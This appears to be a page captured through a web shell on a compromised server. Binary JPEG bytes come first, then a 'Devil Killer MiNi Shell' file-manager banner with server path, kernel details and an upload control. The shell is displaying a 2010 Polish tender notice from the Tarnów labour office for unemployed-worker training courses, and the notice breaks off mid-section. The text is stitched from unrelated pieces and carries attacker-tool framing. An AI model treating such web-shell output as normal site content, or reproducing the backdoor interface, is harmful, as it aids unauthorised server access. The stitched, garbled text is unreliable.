JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100419/88949-N-2010.html

<p class="kh_header"><b>Tarnów: Przedmiotem zamówienia są /Szkolenia dla osób bezrobotnych i poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Tarnowie /spawanie blach i rur spoinami pachwinowymi metoda MIG (131) i metoda MAG (135), kosztorysowanie robót budowlanych, opiekun medyczny osób starszych i chorych z elementami rehabilitacji, spawanie blach i rur spoinami pachwinowymi metoda TIG (141)/ -  szkolenia przyjęte 
do realizacji w 2010r. - zgodnie z planem szkoleń.</b><br>
<b>Numer ogłoszenia: 88949 - 2010; data zamieszczenia: 19.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Tarnowie , pl. J. Bema 3, 33-100 Tarnów, woj. małopolskie, tel. 014 6882300, faks 014 6882301.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są /Szkolenia dla osób bezrobotnych i poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Tarnowie /spawanie blach i rur spoinami pachwinowymi metoda MIG (131) i metoda MAG (135), kosztorysowanie robót budowlanych, opiekun medyczny osób starszych i chorych z elementami rehabilitacji, spawanie blach i rur spoinami pachwinowymi metoda TIG (141)/ -  szkolenia przyjęte 
do realizacji w 2010r. - zgodnie z planem szkoleń..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są /Szkolenia dla osób bezrobotnych i poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Tarnowie /spawanie blach i rur spoinami pachwinowymi metoda MIG (131) i metoda MAG (135), kosztorysowanie robót budowlanych, opiekun medyczny osób starszych i chorych z elementami rehabilitacji, spawanie blach i rur spoinami pachwinowymi metoda TIG (141)/ -  szkolenia przyjęte 
do realizacji w 2010r. - zgodnie z planem szkoleń. 
Opis przedmiotu zamówienia zgodnie ze Wspólnym Słownikiem Zamówień dla wszystkich części zamówienia (tj. od I do IV):
Kod CPV - 80530000-5,
OPIS - Usługi szkolenia zawodowego

Części zamówienia:
CZĘŚĆ I zamówienia
Przedmiotem zamówienia jest przeprowadzenie szkolenia /Spawanie blach i rur spoinami pachwinowymi metoda MIG (131) i metoda MAG (135)/ dla 20 osób 
(w 2-ch grupach po 10 osób). Szkolenie winno obejmować minimum 290 godzin zegarowych zajęć w tym minimum 226 godzin zajęć praktycznych. Szkolenie musi być realizowane zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach. Szkolenie musi trwać średnio nie mniej niż 30 godzin zegarowych w tygodniu. Szkolenie nie może przekroczyć 40 godzin zegarowych w tygodniu. Zajęcia realizowane od poniedziałku do piątku. Przy jednym stanowisku praktycznej nauki zawodu mogą pracować maksymalnie 2 osoby. Absolwent szkolenia otrzymuje książeczkę spawacza, świadectwo egzaminu spawacza oraz zaświadczenie o ukończeniu szkolenia zgodne z wzorem (załącznik nr 8 do SIWZ).


CZĘŚĆ II zamówienia
Przedmiotem zamówienia jest przeprowadzenie szkolenia /Kosztorysowanie robót budowlanych/ dla 10 osób. Szkolenie  winno obejmować minimum 80 godzin zegarowych w tym 50 godzin zajęć praktycznych. Program szkolenia winien uwzględniać: zajęcia teoretyczne i praktyczne, podstawy sporządzania przedmiaru robót budowlanych, wykonywanie przedmiarów robót betonowych i żelbetonowych monolitycznych, przedmiarów robót murowych, przedmiarów konstrukcji drewnianych, pokryć dachowych, robót izolacyjnych, robót budowlanych wykończeniowych, robót remontowych, wykonywanie obmiaru robót budowlanych, sporządzanie przedmiarów 
i obmiarów robót budowlanych przy pomocy programów komputerowych, zasady korzystania z katalogów nakładów rzeczowych, kosztorysowanie robót ziemnych, murowych, betonowych i żelbetonowych monolitycznych, konstrukcji drewnianych, robót izolacyjnych, wykończeniowych, robót remontowych, sporządzanie kosztorysów przy pomocy programów komputerowych. Szkolenie musi trwać średnio nie mniej niż 30 godzin zegarowych 
w tygodniu. Szkolenie nie może przekroczyć 40 godzin zegarowych w tygodniu. Zajęcia realizowane od poniedziałku do piątku. Absolwent szkolenia otrzymuje zaświadczenie 
o ukończeniu szkolenia zgodne z wzorem (załącznik nr 8 do SIWZ).

CZĘŚĆ III zamówienia
Przedmiotem zamówienia jest przeprowadzenie szkolenia /Opiekun medyczny osób starszych i chorych z elementami rehabilitacji/ dla 15 osób. Szkolenie winno obejmować minimum 200 godzin zegarowych w tym 140 godzin zajęć praktycznych. Program szkolenia winien obejmować: zagadnienia związane z elementami pedagogiki specjalnej oraz gerontologii, zasady etyczno - moralne, udzielanie pierwszej pomocy w sytuacji zagrożenia życia lub określonej niedyspozycji, podstawowe czynności pielęgnacyjno - higieniczne, technikami wykonywania podstawowych zabiegów rehabilitacyjnych, stosowaniem wybranych form terapii zajęciowej i organizowanie zajęć rekreacyjnych podopiecznych. Szkolenie musi trwać średnio nie mniej niż 30 godzin zegarowych w tygodniu. Szkolenie nie może przekroczyć 40 godzin zegarowych w tygodniu. Zajęcia realizowane od poniedziałku do piątku. Absolwent szkolenia otrzymuje zaświadczenie o ukończeniu szkolenia zgodne z wzorem (załącznik nr 8 do SIWZ).


CZĘŚĆ IV zamówienia
Przedmiotem zamówienia jest przeprowadzenie szkolenia /Spawanie blach i rur spoinami pachwinowymi metoda TIG (141)/ dla 20 osób (w 2-ch grupach po 10 osób). Szkolenie winno obejmować minimum 134 godziny zegarowe w tym minimum 103 godziny zajęć praktycznych. Szkolenie musi być realizowane zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach. Szkolenie musi trwać średnio nie mniej niż 30 godzin zegarowych w tygodniu. Szkolenie nie może przekroczyć 40 godzin zegarowych w tygodniu. Zajęcia realizowane od poniedziałku do piątku. Przy jednym stanowisku praktycznej nauki zawodu mogą pracować maksymalnie 2 osoby. Absolwent szkolenia otrzymuje książeczkę spawacza, świadectwo egzaminu spawacza oraz zaświadczenie o ukończeniu szkolenia zgodne z wzorem (załącznik nr 8 do SIWZ)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania posiadania uprawnień wykonawca musi być wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy, wpis musi być uaktualniony na 2010 rok.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DLA CZĘŚCI I zamówienia
1.Wykonawca musi posiadać doświadczenie polegające na przeprowadzeniu 
w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 2-ch szkoleń dla minimum 10 osób z zakresu /Spawanie blach i rur spoinami pachwinowymi metoda MIG (131) i metoda MAG (135)/. 
2. Oświadczenie wykonawcy - załącznik nr 2
DLA CZĘŚCI II zamówienia  
1.Wykonawca musi posiadać doświadczenie polegające na przeprowadzeniu 
w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum jednego szkolenia dla minimum 10 osób z zakresu /Kosztorysowanie robót budowlanych/.
2. Oświadczenie wykonawcy - załącznik nr 2
DLA CZĘŚCI III zamówienia - oświadczenie wykonawcy (załącznik nr2)
DLA CZĘŚĆ IV zamówienia 
1.Wykonawca musi posiadać doświadczenie polegające na przeprowadzeniu 
w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 2-ch szkoleń dla minimum 10 osób z zakresu /Spawanie blach i rur spoinami pachwinowymi metoda TIG (141)/.
2. Oświadczenie wykonawcy - załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DLA I CZĘŚCI ZAMÓWIENIA
Zajęcia teoretyczne na kursie muszą być prowadzone przez co najmniej 2 osoby 
z wykształceniem wyższym kierunkowym, co najmniej 5 letnim stażem pracy zgodnym z kierunkiem kształcenia i przygotowaniem pedagogicznym, zajęcia praktyczne muszą być prowadzone przez co najmniej 2 osoby posiadające minimum średnie wykształcenie kierunkowe oraz co najmniej 5 letni staż pracy zgodny z kierunkiem kształcenia i przygotowanie pedagogiczne.
DLA II CZĘŚCI ZAMÓWIENIA
Zajęcia teoretyczne na kursie muszą być prowadzone przez co najmniej 1 osobę 
z wykształceniem wyższym kierunkowym, co najmniej 5 letnim stażem pracy zgodnym z kierunkiem kształcenia i przygotowaniem pedagogicznym, zajęcia praktyczne muszą być prowadzone przez co najmniej 1 osobę posiadającą minimum średnie wykształcenie kierunkowe oraz co najmniej 5 letni staż pracy zgodny z kierunkiem kształcenia i przygotowanie pedagogiczne.
DLA III CZĘŚCI ZAMÓWIENIA
Zajęcia teoretyczne muszą być prowadzone przez co najmniej 2 osoby 
z wykształceniem wyższym kierunkowym, co najmniej 5 letnim stażem pracy zgodnym z kierunkiem kształcenia i przygotowaniem pedagogicznym. Zajęcia praktyczne muszą być prowadzone przez co najmniej 2 osoby z czego jedna musi posiadać wykształcenie wyższe kierunkowe, co najmniej 5 letni staż pracy zgodny z kierunkiem kształcenia i przygotowaniem pedagogicznym, natomiast druga osoba musi posiadać minimum wykształcenie średnie kierunkowe, co najmniej 5 letni staż pracy zgodny z kierunkiem kształcenia i przygotowaniem pedagogicznym.
DLA IV CZĘŚCI ZAMÓWIENIA
Zajęcia teoretyczne na kursie muszą być prowadzone przez co najmniej 2 osoby 
z wykształceniem wyższym kierunkowym, co najmniej 5 letnim stażem pracy zgodnym z kierunkiem kształcenia i przygotowaniem pedagogicznym, zajęcia praktyczne muszą być prowadzone przez co najmniej 2 osoby posiadające minimum średnie wykształcenie kierunkowe oraz co najmniej 5 letni staż pracy zgodny z kierunkiem kształcenia i przygotowanie pedagogiczne .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane usługi spełniają wymagania określone przez zamawiającego wykonawca musi przedstawić program szkolenia odpowiedni dla danej części zamówienia zgodnie z opisem przedmiotu zamówienia - załącznik nr 3 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.70</li>
<li>2 - Efektywność/Współpraca (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach) - 0.20</li>
<li>3 - Certyfikat jakości usług - 0.10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru w następujący sposób:
a) w uzasadnionych przypadkach dopuszcza się zmianę kadry prowadzącej szkolenie, pod warunkiem, że proponowana kadra będzie spełniała warunki opisane w niniejszej specyfikacji. Informacja o zmianie musi wpłynąć do zamawiającego na piśmie na co najmniej 1 dzień przed zaistniałą okolicznością.
b) w uzasadnionych przypadkach dopuszcza się zmianę miejsca prowadzenia szkolenia. Informacja o zmianie musi wpłynąć do zamawiającego na piśmie co najmniej 5 dni roboczych przed rozpoczęciem szkolenia,
c) w uzasadnionych przypadkach za zgodą wykonawcy zamawiający może, zmienić termin rozpoczęcia i zakończenia szkolenia, przy czym warunki dotyczące tygodniowego wymiaru godzin oraz terminu realizacji zamówienia nie mogą ulec zmianie. Informacja o zmianie musi wpłynąć do zamawiającego na piśmie co najmniej 5 dni roboczych przed rozpoczęciem szkolenia.
2.Zamawiający musi wyrazić zgodę na wprowadzenie zmian o których mowa 
w ust. 1.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.tarnow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Tarnowie, pl.gen. J. Bema 3, 33-100 Tarnów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2010 godzina 12:00, miejsce: Powiatowy Urząd Pracy w Tarnowie, pl.gen. J. Bema 3, 33-100 Tarnów pok. 214, (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie szkolenia /Spawanie blach i rur spoinami pachwinowymi metoda MIG (131) i metoda MAG (135)/ dla 20 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia /Spawanie blach i rur spoinami pachwinowymi metoda MIG (131) i metoda MAG (135)/dla 20 osób 
(w 2-ch grupach po 10 osób). Szkolenie winno obejmować minimum 290 godzin zegarowych zajęć w tym minimum 226 godzin zajęć praktycznych. Szkolenie musi być realizowane zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach. Szkolenie musi trwać średnio nie mniej niż 30 godzin zegarowych w tygodniu. Szkolenie nie może przekroczyć 40 godzin zegarowych w tygodniu. Zajęcia realizowane od poniedziałku do piątku. Przy jednym stanowisku praktycznej nauki zawodu mogą pracować maksymalnie 2 osoby. Absolwent szkolenia otrzymuje książeczkę spawacza, świadectwo egzaminu spawacza oraz zaświadczenie o ukończeniu szkolenia zgodne z wzorem (załącznik nr 8 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 57.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. EFEKTYWNOŚĆ/WSPÓŁPRACA  (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach) - 0.20</li>
<li>3. Certyfikat jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie szkolenia /Kosztorysowanie robót budowlanych/ dla 10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia /Kosztorysowanie robót budowlanych/ dla 10 osób. Szkolenie  winno obejmować minimum 80 godzin zegarowych w tym 50 godzin zajęć praktycznych. Program szkolenia winien uwzględniać: zajęcia teoretyczne i praktyczne, podstawy sporządzania przedmiaru robót budowlanych, wykonywanie przedmiarów robót betonowych i żelbetonowych monolitycznych, przedmiarów robót murowych, przedmiarów konstrukcji drewnianych, pokryć dachowych, robót izolacyjnych, robót budowlanych wykończeniowych, robót remontowych, wykonywanie obmiaru robót budowlanych, sporządzanie przedmiarów 
i obmiarów robót budowlanych przy pomocy programów komputerowych, zasady korzystania z katalogów nakładów rzeczowych, kosztorysowanie robót ziemnych, murowych, betonowych i żelbetonowych monolitycznych, konstrukcji drewnianych, robót izolacyjnych, wykończeniowych, robót remontowych, sporządzanie kosztorysów przy pomocy programów komputerowych. Szkolenie musi trwać średnio nie mniej niż 30 godzin zegarowych 
w tygodniu. Szkolenie nie może przekroczyć 40 godzin zegarowych w tygodniu. Zajęcia realizowane od poniedziałku do piątku. Absolwent szkolenia otrzymuje zaświadczenie o ukończeniu szkolenia zgodne z wzorem (załącznik nr 8 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 15.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. EFEKTYWNOŚĆ/WSPÓŁPRACA  (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach) - 0.20</li>
<li>3. Certyfikat jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeprowadzenie szkolenia /Opiekun medyczny osób starszych i chorych z elementami rehabilitacji/ dla 15 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia /Opiekun medyczny osób starszych i chorych z elementami rehabilitacji/ dla 15 osób. Szkolenie winno obejmować minimum 200 godzin zegarowych w tym 140 godzin zajęć praktycznych. Program szkolenia winien obejmować: zagadnienia związane z elementami pedagogiki specjalnej oraz gerontologii, zasady etyczno - moralne, udzielanie pierwszej pomocy w sytuacji zagrożenia życia lub określonej niedyspozycji, podstawowe czynności pielęgnacyjno - higieniczne, technikami wykonywania podstawowych zabiegów rehabilitacyjnych, stosowaniem wybranych form terapii zajęciowej i organizowanie zajęć rekreacyjnych podopiecznych. Szkolenie musi trwać średnio nie mniej niż 30 godzin zegarowych w tygodniu. Szkolenie nie może przekroczyć 40 godzin zegarowych w tygodniu. Zajęcia realizowane od poniedziałku do piątku. Absolwent szkolenia otrzymuje zaświadczenie o ukończeniu szkolenia zgodne z wzorem (załącznik nr 8 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 43.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. EFEKTYWNOŚĆ/WSPÓŁPRACA  (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach) - 0.20</li>
<li>3. Certyfikat jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia /Spawanie blach i rur spoinami pachwinowymi metoda TIG (141)/ dla 20 osób.</p>
